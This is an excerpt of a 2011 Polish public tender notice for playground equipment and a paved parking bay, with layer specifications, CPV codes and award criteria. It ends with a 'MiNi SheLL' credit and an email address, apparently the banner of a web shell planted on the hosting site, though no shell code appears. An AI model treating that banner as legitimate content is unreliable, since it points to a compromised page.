b)	Zabawka jednoosobowa na sprężynie - typu kiwak lub bujak, imitacja samolotu z jednym siedziskiem - 1 kpl,
c)	Zabawka dwuosobowa na sprężynie - typu ważka imitacja zwierząt - 1 kpl,
d)	Zabawka dwuosobowa - typu ważka zwykła- imitacja zwierząt - 1 kpl,
e)	Huśtawka podwójna wahadłowa z drabinkami - 1 kpl,
f)	Karuzela czteroosobowa krzyżowa - 1 kpl,
g)	Wieża z balkonikiem - 1 kpl,
h)	Regulamin placu zabaw, stale zakotwiczony w gruncie - 1 kpl,
i)	   Metalowy kosz na śmieci - 2 szt,
j)	   Ławki parkowe betonowo - drewniane - 2 szt,
k)	Transport elementów opisanych w punktach 1 - 10 na miejsce, montaż u zamawiającego.

2)	Zatoka postojowa dla samochodów,
Zakres opracowania obejmuje:
a)	wykonanie robot ziemnych,
b)	wykonanie robót brukarskich,
c)	wykonanie warstwy odcinającej z piasku,
d)	wykonanie podbudowy,
e)	wykonanie warstwy wiążącej z BA KR I-II,
f)	wykonanie warstwy ścieralnej z BA KR I-II,
g)	Uporządkowanie terenu bezpośrednio przyległego do terenu budowy w zasięgu robót budowlanych.

Nawierzchnie drogowe
Kategoria obciążenia ruchem - przyjęto, jako KRI.

Rozwiązanie projektowe:
jezdnia:
-	warstwa odcinająca z piasku zwykłego o gr. 15cm,
-	podbudowa kruszywo łamane 0 63mm o gr. 20cm,
-	warstwa wiążąca z BA KR1-2 0 12,8mm o gr. 4cm,
-	warstwa ścieralna z BA KR1-2 0 12,8mm o gr. 4cm
 chodniki:
-	warstwa kruszywa łamanego 0 31,5mm stabilizowanego mechanicznie o grubości 10cm,
-	warstwa podsypki cementowo-piaskowej z piasku łamanego grubości 5cm po zagęszczeniu,
-	warstwa ścieralna z kostki brukowej betonowej kolorowej 6cm,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.10.00-8, 45.11.20.00-5, 45.23.30.00-9, 45.11.27.23-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com